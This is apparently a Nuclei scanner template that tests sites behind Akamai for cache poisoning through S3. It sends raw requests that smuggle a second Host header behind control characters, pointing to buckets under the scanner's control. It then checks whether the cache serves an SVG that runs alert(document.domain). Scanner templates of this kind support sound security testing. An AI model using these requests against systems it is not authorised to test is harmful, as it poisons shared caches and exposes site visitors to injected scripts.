id: akamai-s3-cache-poisoning info: name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting author: DhiyaneshDk severity: high reference: - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ - https://owasp.org/www-community/attacks/Cache_Poisoning metadata: verified: "true" tags: cache,poisoning,generic,xss,akamai,s3 variables: rand: "{{rand_base(5)}}" requests: - raw: - |+ GET /nuclei.svg?{{rand}}=x HTTP/1.1 Host: {{Hostname}} {{escape}}Host: {{bucket}} - |+ GET /nuclei.svg?{{rand}}=x HTTP/1.1 Host: {{Hostname}} attack: clusterbomb payloads: escape: - "\x0b" - "\x0c" - "\x1c" - "\x1d" - "\x1e" - "\x1f" bucket: - "nuclei-ap-northeast-1" - "nuclei-ap-northeast-2" - "nuclei-ap-northeast-3" - "nuclei-ap-south-1" - "nuclei-ap-southeast-1" - "nuclei-ap-southeast-2" - "nuclei-ca-central-1" - "nuclei-eu-central-1" - "nuclei-eu-north-1" - "nuclei-eu-west-1" - "nuclei-eu-west-2" - "nuclei-eu-west-3" - "nuclei-sa-east-1" - "nuclei-us-east-1" - "nuclei-us-east-2" - "nuclei-us-west-1" - "nuclei-us-west-2" stop-at-first-match: true unsafe: true matchers: - type: dsl dsl: - 'contains(body_2, "alert(document.domain)")' - 'status_code_2 == 200' condition: and